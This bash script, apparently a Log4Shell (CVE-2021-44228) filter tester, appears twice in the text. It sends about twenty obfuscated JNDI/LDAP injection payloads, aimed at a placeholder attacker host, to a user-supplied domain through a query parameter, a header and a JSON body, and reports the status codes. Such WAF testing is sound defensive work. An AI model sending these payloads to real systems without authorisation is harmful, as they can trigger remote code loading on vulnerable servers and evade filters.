johnhpatton/cve-2021-44228-tester.sh

## cve-2021-44228-tester.sh
declare -a PATTERNS=()
           PATTERNS+=('${jndi:ldap:attacker_controled_website/payload_to_be_executed}')
           PATTERNS+=('${j${k8s:k5:-ND}i${sd:k5:-:}}')
           PATTERNS+=('${j${main:\k5:-Nd}i${spring:k5:-:}}')
           PATTERNS+=('${j${sys:k5:-nD}${lower:i${web:k5:-:}}}')
           PATTERNS+=('${j${::-nD}i${::-:}}')
           PATTERNS+=('${j${EnV:K5:-nD}i:}')
           PATTERNS+=('${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}attacker_controled_website/payload_to_be_executed}')
           PATTERNS+=('${j${loWer:Nd}i${uPper::}}')
           PATTERNS+=('${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://attacker_controled_website/payload_to_be_executed }')
           PATTERNS+=('${jndi:${lower:l}${lower:d}a${lower:p}://attacker_controled_website/payload_to_be_executed}')
           PATTERNS+=('${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attacker_controled_website/payload_to_be_executed}')
           PATTERNS+=('${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attacker_controled_website/payload_to_be_executed}')
           PATTERNS+=('${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}attacker_controled_website/payload_to_be_executed}')
           PATTERNS+=('${jndi:${lower:l}${lower:d}ap://attacker_controled_website/payload_to_be_executed}')
           PATTERNS+=('${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://attacker_controled_website/payload_to_be_executed}')
           PATTERNS+=('${${::-j}ndi:}')
           PATTERNS+=('${${::-j}nd${::-i}:}')
           PATTERNS+=('${${en${lower:v}:ENV_NAME:-j}}')
           PATTERNS+=('${${lower:${upper:${lower:${upper:${lower:${upper:${lower:${upper:${lower:${upper:${lower:${upper:${lower:j}}}}}}}}}}}}}}')

[ -z "$1" ] && { echo "Usage: $0 {domain}"; exit 1; }

# None of these should be a positive response code
for p in "${PATTERNS[@]}"; do
    echo "Testing request with: ${p}"
    curl -skG -w '%{http_code}\n' --data-urlencode "productid=${p}" -o /dev/null https://$1/
    echo "Testing header with: ${p}"
    curl -sk -w '%{http_code}\n' -H "X-Attack-Test: ${p}" -o /dev/null https://$1/
    echo "Testing request body with: ${p}"
    curl -sk -w '%{http_code}\n\n' -d "{\"ProductID\": \"${p}\"}" -o /dev/null https://$1/
done
	declare -a PATTERNS=()
	PATTERNS+=('${jndi:ldap:attacker_controled_website/payload_to_be_executed}')
	PATTERNS+=('${j${k8s:k5:-ND}i${sd:k5:-:}}')
	PATTERNS+=('${j${main:\k5:-Nd}i${spring:k5:-:}}')
	PATTERNS+=('${j${sys:k5:-nD}${lower:i${web:k5:-:}}}')
	PATTERNS+=('${j${::-nD}i${::-:}}')
	PATTERNS+=('${j${EnV:K5:-nD}i:}')
	PATTERNS+=('${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}attacker_controled_website/payload_to_be_executed}')
	PATTERNS+=('${j${loWer:Nd}i${uPper::}}')
	PATTERNS+=('${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://attacker_controled_website/payload_to_be_executed }')
	PATTERNS+=('${jndi:${lower:l}${lower:d}a${lower:p}://attacker_controled_website/payload_to_be_executed}')
	PATTERNS+=('${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attacker_controled_website/payload_to_be_executed}')
	PATTERNS+=('${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attacker_controled_website/payload_to_be_executed}')
	PATTERNS+=('${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}attacker_controled_website/payload_to_be_executed}')
	PATTERNS+=('${jndi:${lower:l}${lower:d}ap://attacker_controled_website/payload_to_be_executed}')
	PATTERNS+=('${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://attacker_controled_website/payload_to_be_executed}')
	PATTERNS+=('${${::-j}ndi:}')
	PATTERNS+=('${${::-j}nd${::-i}:}')
	PATTERNS+=('${${en${lower:v}:ENV_NAME:-j}}')
	PATTERNS+=('${${lower:${upper:${lower:${upper:${lower:${upper:${lower:${upper:${lower:${upper:${lower:${upper:${lower:j}}}}}}}}}}}}}}')

	[ -z "$1" ] && { echo "Usage: $0 {domain}"; exit 1; }

	# None of these should be a positive response code
	for p in "${PATTERNS[@]}"; do
	echo "Testing request with: ${p}"
	curl -skG -w '%{http_code}\n' --data-urlencode "productid=${p}" -o /dev/null https://$1/
	echo "Testing header with: ${p}"
	curl -sk -w '%{http_code}\n' -H "X-Attack-Test: ${p}" -o /dev/null https://$1/
	echo "Testing request body with: ${p}"
	curl -sk -w '%{http_code}\n\n' -d "{\"ProductID\": \"${p}\"}" -o /dev/null https://$1/
	done